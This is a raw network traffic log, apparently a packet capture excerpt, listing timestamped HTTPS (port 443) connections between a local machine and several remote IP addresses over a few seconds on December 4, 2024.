                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.514818907 CET49979443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.514849901 CET49979443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.577575922 CET49979443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.577641010 CET4434997913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.602910042 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.602947950 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.603035927 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.603214025 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.603229046 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.915946960 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.924113035 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.924146891 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.925647974 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.925657988 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.949137926 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.953516960 CET49980443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.953556061 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.956924915 CET49980443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:02.956933022 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.293234110 CET49994443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.293294907 CET44349994159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.293426991 CET49994443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.293781042 CET49994443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.293787956 CET44349994159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.317209005 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.317833900 CET49983443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.317862034 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.318423986 CET49983443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.318432093 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.410454988 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.410490036 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.410550117 CET49980443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.410579920 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.410904884 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.410907030 CET49980443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.410917997 CET49980443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.410940886 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.410950899 CET49980443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.410968065 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.414174080 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.414232969 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.414597034 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.414824963 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.414830923 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.427215099 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.427242041 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.427256107 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.427331924 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.427355051 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.427398920 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.519701004 CET44349988184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.519792080 CET49988443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.521562099 CET49988443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.521574974 CET44349988184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.521836042 CET44349988184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.562542915 CET49988443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.563397884 CET49988443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.602271080 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.602305889 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.602355957 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.602375031 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.602389097 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.602416992 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.602437019 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.602683067 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.602695942 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.602719069 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.602724075 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.606318951 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.606364965 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.606431961 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.606673002 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.606679916 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.607340097 CET44349988184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.801165104 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.801194906 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.801246881 CET49983443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.801254988 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.801299095 CET49983443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.801464081 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.801707983 CET49983443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.801727057 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.801742077 CET49983443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.801747084 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.802153111 CET49987443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.802182913 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.802634001 CET49987443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.802642107 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.804841995 CET49997443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.804886103 CET4434999713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.804958105 CET49997443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.805120945 CET49997443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:03.805128098 CET4434999713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.051493883 CET44349988184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.051564932 CET44349988184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.051630974 CET49988443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.051882982 CET49988443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.051908970 CET44349988184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.051918983 CET49988443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.051924944 CET44349988184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.100224972 CET49998443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.100292921 CET44349998184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.100388050 CET49998443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.100895882 CET49998443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.100905895 CET44349998184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.269254923 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.269282103 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.269371033 CET49987443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.269387007 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.269774914 CET49987443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.269782066 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.269805908 CET49987443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.269927979 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.269985914 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.270037889 CET49987443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.272819042 CET49999443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.272859097 CET4434999913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.272924900 CET49999443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.273123980 CET49999443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.273139000 CET4434999913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.332096100 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.341470957 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.341487885 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.341984034 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.341989040 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.386444092 CET49973443192.168.2.6142.250.181.68
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.388607979 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.388649940 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.388803959 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.389116049 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.389127970 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.744688988 CET44349994159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.744822979 CET49994443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.745479107 CET49994443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.745493889 CET44349994159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.747354984 CET49994443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.747364044 CET44349994159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.774791956 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.777919054 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.778204918 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.780630112 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.780652046 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.780716896 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.780723095 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.783999920 CET50001443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.784053087 CET4435000113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.784137964 CET50001443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.784352064 CET50001443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:04.784358978 CET4435000113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.210089922 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.210872889 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.210916996 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.211504936 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.211519003 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.401357889 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.401894093 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.401932001 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.402456045 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.402463913 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.586024046 CET44349998184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.586134911 CET49998443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.587533951 CET49998443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.587544918 CET44349998184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.591568947 CET44349998184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.597003937 CET49998443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.639334917 CET44349998184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.687490940 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.687581062 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.687693119 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.688004017 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.688026905 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.688040018 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.688045979 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.691833973 CET50002443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.691871881 CET4435000213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.691978931 CET50002443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.692166090 CET50002443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.692172050 CET4435000213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.815483093 CET44349994159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.815562963 CET44349994159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.815639973 CET49994443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.816859007 CET49994443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.816859007 CET49994443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.854203939 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.857779980 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.857902050 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.858270884 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.858294964 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.858308077 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.858314037 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.861557007 CET50003443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.861603022 CET4435000313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.861712933 CET50003443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.861860037 CET50003443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.861865997 CET4435000313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.889322996 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.890072107 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.890680075 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.890691996 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.892693996 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.892704010 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.892784119 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.892800093 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.892805099 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.892810106 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.892890930 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.892910004 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893004894 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893029928 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893034935 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893052101 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893146992 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893160105 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893177986 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893187046 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893203020 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893217087 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893287897 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893299103 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893316984 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893327951 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893349886 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893358946 CET50000443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893366098 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:05.893373966 CET44350000159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.093183994 CET4434999713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.094047070 CET49997443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.094079018 CET4434999713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.094548941 CET49997443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.094556093 CET4434999713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.125938892 CET49994443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.125988007 CET44349994159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.138084888 CET44349998184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.138163090 CET44349998184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.138242006 CET49998443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.139087915 CET49998443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.139106989 CET44349998184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.139122009 CET49998443192.168.2.6184.30.17.174
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.139127016 CET44349998184.30.17.174192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.139698982 CET4434999913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.140630007 CET49999443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.140650988 CET4434999913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.141140938 CET49999443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.141146898 CET4434999913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.394073963 CET50004443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.394118071 CET44350004159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.394196033 CET50004443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.394458055 CET50004443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.394463062 CET44350004159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.529326916 CET4435000113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.529855967 CET50001443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.529881954 CET4435000113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.530330896 CET50001443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.530338049 CET4435000113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:06.539521933 CET4434999713.107.246.63192.168.2.6
